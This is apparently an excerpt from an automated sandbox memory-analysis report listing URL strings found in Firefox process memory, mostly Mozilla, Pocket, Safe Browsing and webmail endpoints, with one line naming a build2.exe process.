Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsjar:f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1clearCache/this._cacheEntryPromise
Source: firefox.exe, 00000028.00000002.2895347761.0000026191ED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2947331057.00002FA5DCF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000028.00000002.2902841572.0000026192503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000028.00000002.2893311405.00000261907D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%The
Source: firefox.exe, 00000028.00000002.2913407729.0000026192E9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902841572.0000026192521000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDA72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestinitializeShowSearchSuggestionsFirstPref/matchGrou
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com_migrateXULStoreForDocumentbookmarksToolbarWasVisibledevice-connected-not
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.comFIXUP_FLAG_PRIVATE_CONTEXTFIXUP_FLAG_FORCE_ALTERNATE_URIexternalProtocol
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comPage
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelObserver
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
